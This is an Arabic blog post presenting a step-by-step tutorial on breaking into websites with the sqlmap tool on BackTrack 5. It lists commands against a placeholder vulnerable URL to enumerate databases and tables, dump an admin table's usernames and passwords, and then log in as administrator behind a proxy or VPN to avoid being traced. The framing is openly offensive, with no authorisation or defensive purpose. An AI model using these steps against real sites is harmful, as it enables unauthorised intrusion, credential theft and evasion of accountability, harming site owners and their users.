الخميس، 31 أكتوبر، 2013

كيف يقوم الهاكر بختراق المواقع بستعمال sqlmap

شرح أداة رائعة موجودة بالباك تراك 5 وهى أداة sqlmap.py SQL التي تساعدك على الإختراق بسهولة. اتبع الخطوات البسيطة الإختراق الموقع باستخدام backtrak 5

1. نفتح اباكتراك ونكتب cd /pentest/database/sqlmap وبهذا بإن أداة sqlmap مفتوحة !

2. الآن العثور على موقع مصاب. 

3. الآن اكتب هذا الأمر  واضغط على enter. 


python sqlmap.py -u http://xxxxxxxxxx/index.php?id=4 –dbs

http://xxxxxxxxxx/index.php?id=4 هو رابط الموقع المصاب

4. الآن سوف تحصل على اسم قاعدة البيانات للموقع !

حسنا أنا حصلت على اثنين من قاعدة بيانات AJ وinformation_schema سوف نقوم بتحديد قاعدة بيانات.

5. الآن الحصول على جداول قاعدة البيانات. لذلك تحتاج إلى إدخال هذا الأمر وإضغط enter.

python sqlmap.py -u 
http://xxxxxxxxxx/index.php?id=4 -D  (database name) –tables

6. الآن نحن بحاجة للاستيلاء على الجداول من قاعدة البيانات AJ. لصق هذا الأمر أدناه وإضغط enter.


python sqlmap.py -u http://xxxxxxxxxx/index.php?id=4 -D aj –tables

7. الآن سوف تحصل على قائمة الجداول التي يتم تخزينها في قاعدة البيانات AJ

8. الآن أصبح بإمكانك الاستيلاء على أعمدة من الجدول الإدارة

python sqlmap.py -u http://xxxxxxxxxx/index.php?id=4 -T admin --columns 


الآن حصلنا على الأعمدة وحصلنا على اسم المستخدم وكلمة المرور9. الآن يتيح الاستيلاء على كلمات السر من admin

python sqlmap.py -u http://xxxxxxxxxx/index.php?id=4 -T admin -U test --dump

الآن حصلنا على اسم المستخدم وكلمة المرور للموقع!


الآن بمجرد العثور على معلومات الإدارة للموقع واستخدام بروكسي/ VPN وسيثم الدخول في الموقع باعتبارك admin.

0 التعليقات:

إرسال تعليق

لا تنسى ان تشارك samir soltani بتعليقك
او نشر الموظوع جزاك الله خيرا